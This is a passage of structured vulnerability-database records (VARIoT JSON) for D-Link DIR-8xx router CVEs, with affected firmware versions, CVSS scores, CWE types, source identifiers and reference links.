"data": "D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users\u0027 DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). plural D-Link The product contains authentication vulnerabilities.Information may be obtained. D-Link is a company specializing in the design and development of computer network equipment. D-LinkDIR-817LW is a wireless router from D-Link of Taiwan, China. An information disclosure vulnerability exists in the D-Link router. D-Link DIR-817LW, etc. The following products are affected: D-Link DIR-817LW (A1-1.04); DIR-816L (B1-2.06); DIR-816 (B1-2.06); DIR-850L (A1-1.09); 1.10)",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7642",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-23343",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-159077",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7642",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
]
},
"id": "VAR-201903-0482",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
}
],
"trust": 1.1576200966666665
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
}
]
},
"last_update_date": "2023-12-18T12:43:36.844000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "CVE-2019-7642",
"trust": 0.1,
"url": "https://github.com/xw77cve/cve "
},
{
"title": "CVE-2019-7642",
"trust": 0.1,
"url": "https://github.com/xw77cve/cve-2019-7642 "
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/jonathan-elias/poc "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xt11/cve-poc "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/poc-in-github "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/poc-in-github "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "CWE-287",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/xw77cve/cve-2019-7642/blob/master/readme.md"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7642"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7642"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/306.html"
},
{
"trust": 0.1,
"url": "https://github.com/xw77cve/cve"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/nomi-sec/poc-in-github"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-159077"
},
{
"date": "2019-03-25T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"date": "2019-03-25T22:29:00.810000",
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"date": "2019-03-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-159077"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"date": "2021-04-23T15:45:24.947000",
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Authentication vulnerabilities in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
],
"trust": 0.6
}
}
VAR-201709-0593
Vulnerability from variot - Updated: 2023-12-18 12:29D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices use the same hardcoded /etc/stunnel.key private key across different customers' installations, which allows remote attackers to defeat the HTTPS cryptographic protection mechanisms by leveraging knowledge of this key from another installation. D-Link DIR-850L Device firmware contains a vulnerability related to the use of hard-coded credentials.Information may be obtained. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. This vulnerability is caused by different users using the same hard-coded private key during installation ( /etc/stunnel.key). This vulnerability could be exploited by a remote attacker to compromise the HTTPS encryption protection mechanism. key (/etc/stunnel.key)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0593",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14422"
}
]
},
"cve": "CVE-2017-14422",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14422",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-31787",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-105143",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14422",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14422",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31787",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-573",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105143",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "VULHUB",
"id": "VHN-105143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices use the same hardcoded /etc/stunnel.key private key across different customers\u0027 installations, which allows remote attackers to defeat the HTTPS cryptographic protection mechanisms by leveraging knowledge of this key from another installation. D-Link DIR-850L Device firmware contains a vulnerability related to the use of hard-coded credentials.Information may be obtained. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. This vulnerability is caused by different users using the same hard-coded private key during installation ( /etc/stunnel.key). This vulnerability could be exploited by a remote attacker to compromise the HTTPS encryption protection mechanism. key (/etc/stunnel.key)",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "VULHUB",
"id": "VHN-105143"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14422",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31787",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105143",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "VULHUB",
"id": "VHN-105143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"id": "VAR-201709-0593",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "VULHUB",
"id": "VHN-105143"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
}
]
},
"last_update_date": "2023-12-18T12:29:25.021000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235000"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "NVD",
"id": "CVE-2017-14422"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14422"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14422"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "VULHUB",
"id": "VHN-105143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"db": "VULHUB",
"id": "VHN-105143"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105143"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"date": "2017-09-13T17:29:00.573000",
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31787"
},
{
"date": "2017-09-21T00:00:00",
"db": "VULHUB",
"id": "VHN-105143"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008134"
},
{
"date": "2023-11-08T20:59:19.633000",
"db": "NVD",
"id": "CVE-2017-14422"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to the use of hard-coded credentials in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008134"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-573"
}
],
"trust": 0.6
}
}
VAR-201709-0598
Vulnerability from variot - Updated: 2023-12-18 12:19D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/run/storage_account_root permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit the vulnerability to obtain a certificate
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0598",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31782"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008102"
},
{
"db": "NVD",
"id": "CVE-2017-14427"
},
{
"db": "CNNVD",
